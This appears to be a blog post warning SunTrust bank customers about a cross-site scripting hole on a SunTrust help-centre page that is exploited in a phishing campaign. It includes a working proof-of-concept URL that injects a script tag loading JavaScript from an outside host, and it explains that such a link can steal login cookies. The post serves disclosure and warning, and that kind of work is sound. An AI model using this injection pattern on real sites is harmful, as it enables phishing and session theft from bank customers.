OUCH! SunTrust’s Web site is PWN3d!

I know some of my regular readers have accounts with SunTrust bank. If you do, and you recently received an email telling you that your account records need to be updated, and you clicked on any link in that email, change your account password IMMEDIATELY. It is not necessary for you to have typed in your account username and password at the prompt; the attack can lift the SunTrust cookies from your browser.

You see, SunTrust left a security hole in their Web server; this security hole allows an attacker to use what’s called a “cross site scripting” attack to take control of the pages you see when you browse to SunTrust URLs.

I have confirmed this security hole exists, and have created a quick demo to show how it works. If you click on this link:

Clicky here
[EDIT:] Within 5 minutes of my making this post, LiveJournal’s servers flagged the link as a cross-site scripting link and disabled it. Nicely done! Kudos to the LJ team for making their software aware of hostile links. If you want to try out my demo of the vulnerability, copy into your browser:

http://helpcenter.suntrust.com/doc/sn6400.xml?SID=586&TOPNAME=%22%3E%3C/a%3E%3Cscript%20src=%22http://www.obsidianfields.com/suntrustxssdemo/xssdemo.js

you will be taken to the Web site helpcenter.suntrust.com, a legitimate SunTrust Web page.

[UPDATE]: As of Wednesday afternoon, SunTrust’s IT people have fixed the XSS hole.

But wait! What do you see? If the security hole still exists when you visit this URL, you’ll see a red Web page reading “The cross-site scripting vulnerability at helpcenter.suntrust.com IS STILL ACTIVE”. What’s going on?

What’s going on is that helpcenter.suntrust.com can be fooled just by manipulating the URL into loading content from anywhere on the Web, overwriting whatever is supposed to be there. No, I don’t have access to the SunTrust servers directly, and neither does the attacker. What I CAN do is create a Web page with anything I want, and then create a link that causes my Web page to load at helpcenter.suntrust.com in place of what is supposed to be there. And, if I wanted to, I could also read SunTrust cookies stored in your browser as well, presumably including login cookies if you have ticked the “remember me” checkbox on SunTrust’s login page.

In English, that means you can not trust anything you see displayed at helpcenter.suntrust.com, even if you are 100% positive that the URL of your browser is in fact helpcenter.suntrust.com. It is trivial to create malicious links that change the content displayed at helpcenter.suntrust.com, as I haveshown in my example. This security hole is currently being used in a “phishing” attack that shows you what looks like a perfectly legitimate login page at helpcenter.suntrust.com, but is in fact a page under the control of the hacker on a hacked Web server in Australia.

Technical details under the cut